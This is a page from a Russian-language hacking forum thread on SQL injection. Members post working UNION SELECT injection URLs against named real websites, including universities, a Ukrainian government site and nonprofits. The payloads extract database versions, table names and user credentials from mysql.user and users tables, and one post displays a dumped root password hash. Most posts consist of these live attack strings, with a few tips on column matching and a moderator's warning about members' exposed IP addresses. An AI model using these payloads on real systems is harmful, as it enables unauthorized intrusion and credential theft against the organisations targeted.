SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.xmlhack.com/read.php?item=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables/*
    таблицы юзеров нет =\ обидно..
     
  2. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=-1+union+select+1,2,version(),4,5/*
    коськи =))))))
     
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://kahani.com/current.php?id=-6+union+select+1,convert(version()+using+latin1),3,4,5,6
     
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    вот так повкуснее будет

    http://kahani.com/current.php?id=-6+union+select+1,convert(concat(user,char(58),password)+using+latin1),3,4,5,6+from+mysql.user/*

    root:1386b54e67928d79
     
  5. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.themarchives.com/showproject.php?ID=-5+union+select+1,convert(version()+using+latin1),3,4,5/*
     
    3 people like this.
  6. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.aiap.it/news.php?ID=-864%20UNION%20SELECT%201,database(),3,4,5,6,7,8/*

    Code:
    http://www.top-ix.org/standard.php?id=-59%20UNION%20SELECT%201,2,3,4,5,user,7+from+mysql.user/*

    Code:
    http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20using%20cp1251)%20+from+mysql.user/*
     
  7. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Code:
    http://www.joshuaproject.net/scalelist.php?scalevalue=-1.2+union+select+null,version(),null,null,null,null,null,null,null,null,null,null,null/*
     
  8. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    15 колонок, Mysql3:
    Code:
    __http://www.kennisalliantie.nl/index.php?id=3+group+by+16/*
     
    #1008 Thanat0z, 14 Mar 2007
    Last edited by a moderator: 14 Mar 2007
  9. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.sabeel.org/etemplate.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13
     
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3

    :(

     
  11. fersa

    fersa New Member

    Joined:
    22 Feb 2007
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    А пример можно?
    Так невыходит:
    Code:
    http://h44.lan248.rs/index.php?f=1&s=1'id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    :mad:
     
  12. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    это был не пример :( просто ты помоему незнаеш назначения sql inj или путаеш его с php inj
    http://www.funisland.com/gamelist.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
     
  13. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Объяните пожайлуста, зачем ломать русские сайты??

    Просьба к модераторам, выложить здесь ники со следующими Ip:


    [censored!]

    PS. Если ломаете, то хотя бы думайте головой, а не задницей.
     
    #1013 Dronga, 14 Mar 2007
    Last edited by a moderator: 14 Mar 2007
    1 person likes this.
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    _http://www.caucaz.com/home_eng/breve_contenu.php?id=1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

    Вывод второго поля смотрим внизу, слева над WRITTEN BY
     
  15. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    Вас проверяли на основы анонимной работы в сети.
    Сегодня это были наши мемберы, а завтра это могут быть ребята из органов.

    Делаем выводы.

    Под реальными айпи замечены: Ksander,Colkru,\6/

    ЗЫ: бага, сервак и логи - настоящие. И проблемы у Вас ещё могут быть.
     
    #1015 Elekt, 14 Mar 2007
    Last edited: 14 Mar 2007
  16. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    поля так и несмог подобрать(

    кто заняет как обойти несоответствие
     
    1 person likes this.
  17. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    VampiRUS
    по идее convert(version(),char)
     
    1 person likes this.
  18. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Все топики не смотрел, так что если уже есть, сорри. Привет первонаху _http://www.gay-nn.ru/?aquery=news&id=-106+UNION+SELECT+1,2,3,4,5,6,7,8/* =)
     
  19. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    2VampiRUS
    да ты и таблицы не подобрал)) нужно union+select+*+from+table_name/*

    вот -

    Code:
    http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19+from+users/*
    зы 16 юзеров, перебирать limit'ом :)
     
    #1019 n0ne, 14 Mar 2007
    Last edited: 14 Mar 2007
    1 person likes this.
  20. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    www.loga.gov.ua
    PHP:
    http://www.loga.gov.ua/ua/news/todrug.php?id=-8809+union+select+concat(password,0x3a,user)+from+mysql.user/*
     
Thread Status:
Not open for further replies.